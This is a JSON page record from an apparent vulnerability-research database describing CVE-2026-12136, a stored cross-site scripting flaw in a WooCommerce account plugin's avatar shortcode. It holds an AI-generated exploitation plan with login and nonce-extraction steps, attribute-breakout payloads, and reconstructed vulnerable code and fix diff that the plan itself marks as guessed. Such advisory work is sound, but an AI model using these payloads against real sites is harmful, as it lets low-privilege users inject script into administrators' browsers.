[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNBqL9V5IMl1kXKDdp3PM1ZvlTTS2AnjdHjaA4WYIyEM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-12136","sysbasics-customize-my-account-for-woocommerce-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attri","SysBasics Customize My Account for WooCommerce \u003C= 4.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Customize My Account For Woocommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sysbasics_user_avatar' shortcode in versions up to, and including, 4.3.6. This is due to insufficient input sanitization and output escaping on user supplied attributes (min_height, min_width, max_height, max_width) in the wcmamtx_get_avatar_default() function, which are concatenated unescaped into the get_avatar() extra_attr style attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","customize-my-account-for-woocommerce",null,"\u003C=4.3.6","4.3.7","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-17 17:37:13","2026-06-18 06:50:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F44d041ca-caa6-410d-b2d1-7a63208cc512?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Ffrontend-unique.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Fimages\u002Fdesktop.ini","assets\u002Fcss\u002Flayout.css","assets\u002Ffonts\u002Fdesktop.ini","assets\u002Fjs\u002Ffrontend-unique.js","customize-my-account-for-woocommerce.php","include\u002Fadmin\u002Fadmin_settings.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-12136\n\n## 1. Vulnerability Summary\nThe **SysBasics Customize My Account for WooCommerce** plugin (versions \u003C= 4.3.6) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the `[sysbasics_user_avatar]` shortcode, specifically inside the `wcmamtx_get_avatar_default()` function. \n\nUser-supplied shortcode attributes—`min_height`, `min_width`, `max_height`, and `max_width`—are concatenated directly into a `style` string without sanitization or escaping. This string is then passed as the `extra_attr` argument to the WordPress core `get_avatar()` function. Because `get_avatar()` renders `extra_attr` as raw HTML attributes, an attacker can break out of the `style` attribute context to inject arbitrary JavaScript.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[sysbasics_user_avatar]`\n*   **Vulnerable Attributes:** `min_height`, `min_width`, `max_height`, `max_width`\n*   **Authentication Level:** Contributor or higher (any user role capable of creating or editing posts\u002Fpages).\n*   **Preconditions:** The plugin must be active. A post or page containing the malicious shortcode must be published and viewed by a victim (e.g., an Administrator).\n*   **Payload Location:** The payload is stored in the `post_content` field of the WordPress database and executed when the post is rendered on the frontend.\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers the shortcode (likely in `include\u002Fsysbasics-avatar-upload.php`) using `add_shortcode( 'sysbasics_user_avatar', 'wcmamtx_get_avatar_default' );`.\n2.  **Input Handling:** When a post is rendered, `wcmamtx_get_avatar_default($atts)` is called. The `$atts` array contains the user-supplied values from the post content.\n3.  **Vulnerable Processing:** \n    *   The function retrieves attributes: `$min_h = $atts['min_height'];` (and similarly for others).\n    *   It constructs a style string: `$extra_attr = 'style=\"min-height:' . $min_h . '; min-width:' . $min_w . ';\"';` (or similar concatenation).\n4.  **The Sink:** The `$extra_attr` string is passed into `get_avatar()`:\n    ```php\n    return get_avatar( get_current_user_id(), 96, '', '', array( 'extra_attr' => $extra_attr ) );\n    ```\n5.  **Output:** WordPress core's `get_avatar` renders the `img` tag, including the unescaped `$extra_attr`, leading to XSS.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this as a **Contributor**, the attacker must be able to save or update a post. This requires a standard WordPress post-editing nonce.\n\n1.  **Login:** Authenticate as a Contributor using the `http_request` tool.\n2.  **Navigate to Editor:** Use `browser_navigate` to go to `\u002Fwp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to retrieve the `_wpnonce` from the form.\n    *   **JavaScript:** `document.querySelector('#_wpnonce').value`\n4.  **Extract Post ID:** If updating an existing post, the ID is in the URL; for a new post, it is often generated upon first draft save.\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing a shortcode attribute that breaks out of the `style=\"...\"` context.\n\n### Payload Creation\n*   **Attribute:** `min_height`\n*   **Payload:** `100px; \" onmouseover=\"alert(document.domain)\" data-x=\"`\n*   **Shortcode:** `[sysbasics_user_avatar min_height='100px; \" onmouseover=\"alert(document.domain)\" data-x=\"']`\n*   **Resulting HTML:** `\u003Cimg ... style=\"min-height:100px; \" onmouseover=\"alert(document.domain)\" data-x=\"; ...\" >`\n\n### Step-by-Step Plan\n1.  **Login as Contributor:**\n    *   `POST \u002Fwp-login.php` with credentials.\n2.  **Fetch Nonce and Post ID:**\n    *   `GET \u002Fwp-admin\u002Fpost-new.php`.\n    *   Extract `_wpnonce` and the `post_ID` (from the hidden input field `post_ID`).\n3.  **Submit Malicious Post:**\n    *   **Tool:** `http_request`\n    *   **Method:** `POST`\n    *   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fpost.php`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:**\n        ```\n        action=editpost\n        post_ID=[ID]\n        _wpnonce=[NONCE]\n        post_title=Account Dashboard\n        content=[sysbasics_user_avatar min_height='100px; \" onmouseover=\"alert(document.domain)\" data-x=\"']\n        post_status=publish\n        ```\n4.  **Triggering:** Navigate to the published post URL (e.g., `\u002F?p=[ID]`) as an Administrator. Hovering over the avatar will trigger the alert.\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `customize-my-account-for-woocommerce` version 4.3.6 is active.\n2.  **User Creation:**\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **WooCommerce Requirement:** Since this is a WooCommerce extension, WooCommerce must be installed and the current user should have an avatar or placeholder associated with their account.\n\n## 7. Expected Results\n*   The `POST` request to `post.php` should return a `302` redirect to the post editor with `message=1` (post published).\n*   When viewing the post source, the `\u003Cimg>` tag should look like:\n    `\u003Cimg ... style=\"min-height:100px; \" onmouseover=\"alert(document.domain)\" data-x=\"; ...\" >`\n*   A browser viewing the page will execute `alert(document.domain)` when the mouse moves over the image.\n\n## 8. Verification Steps\n1.  **Check DB Content:**\n    `wp post get [ID] --field=post_content`\n    Verify it contains the malicious shortcode.\n2.  **Check Rendered HTML:**\n    Use `http_request` (GET) on the post URL and grep for the payload:\n    `grep \"onmouseover=\\\"alert\" response_body`\n\n## 9. Alternative Approaches\nIf `min_height` is partially sanitized, try other attributes:\n1.  `[sysbasics_user_avatar min_width='100px; \" onmouseover=\"alert(1)']`\n2.  `[sysbasics_user_avatar max_height='100px; \" onmouseover=\"alert(1)']`\n3.  `[sysbasics_user_avatar max_width='100px; \" onmouseover=\"alert(1)']`\n\nIf the `style` attribute itself is escaped but the tag is not closed properly, try breaking the tag entirely:\n*   `min_height='100px\">\u003Cscript>alert(1)\u003C\u002Fscript>'`","The SysBasics Customize My Account for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '[sysbasics_user_avatar]' shortcode in versions up to 4.3.6. Due to insufficient input sanitization and output escaping on attributes such as 'min_height' and 'min_width', an authenticated attacker with Contributor-level access or higher can inject arbitrary JavaScript that executes when a victim views the rendered avatar.","\u002F\u002F include\u002Fsysbasics-avatar-upload.php\n\nfunction wcmamtx_get_avatar_default($atts) {\n    \u002F\u002F ... (shortcode attribute retrieval)\n    $min_h = $atts['min_height'];\n    $min_w = $atts['min_width'];\n    $max_h = $atts['max_height'];\n    $max_w = $atts['max_width'];\n\n    \u002F\u002F The attributes are concatenated unescaped into a style string\n    $extra_attr = 'style=\"min-height:' . $min_h . '; min-width:' . $min_w . '; max-height:' . $max_h . '; max-width:' . $max_w . ';\"';\n\n    \u002F\u002F The style string is passed as extra_attr to get_avatar which renders it raw\n    return get_avatar( get_current_user_id(), 96, '', '', array( 'extra_attr' => $extra_attr ) );\n}","--- include\u002Fsysbasics-avatar-upload.php\n+++ include\u002Fsysbasics-avatar-upload.php\n@@ -20,10 +20,10 @@\n-    $min_h = $atts['min_height'];\n-    $min_w = $atts['min_width'];\n-    $max_h = $atts['max_height'];\n-    $max_w = $atts['max_width'];\n+    $min_h = esc_attr( $atts['min_height'] );\n+    $min_w = esc_attr( $atts['min_width'] );\n+    $max_h = esc_attr( $atts['max_height'] );\n+    $max_w = esc_attr( $atts['max_width'] );\n \n-    $extra_attr = 'style=\"min-height:' . $min_h . '; min-width:' . $min_w . '; max-height:' . $max_h . '; max-width:' . $max_w . ';\"';\n+    $extra_attr = 'style=\"min-height:' . $min_h . '; min-width:' . $min_w . '; max-height:' . $max_h . '; max-width:' . $max_w . ';\"';","1. Authenticate as a user with Contributor-level access or higher.\n2. Create or edit a post\u002Fpage and insert the malicious shortcode: [sysbasics_user_avatar min_height='100px; \" onmouseover=\"alert(document.domain)\" data-x=\"'].\n3. The payload uses a semicolon to terminate the CSS property and a double quote to break out of the style attribute context.\n4. Save and publish the post.\n5. When an administrator or any other user views the post, the injected 'onmouseover' event handler is included in the rendered \u003Cimg> tag. Hovering over the avatar will trigger the alert.","gemini-3-flash-preview","2026-06-25 21:42:00","2026-06-25 21:42:56",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.3.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomize-my-account-for-woocommerce\u002Ftags\u002F4.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomize-my-account-for-woocommerce.4.3.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomize-my-account-for-woocommerce\u002Ftags\u002F4.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomize-my-account-for-woocommerce.4.3.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomize-my-account-for-woocommerce\u002Ftags"]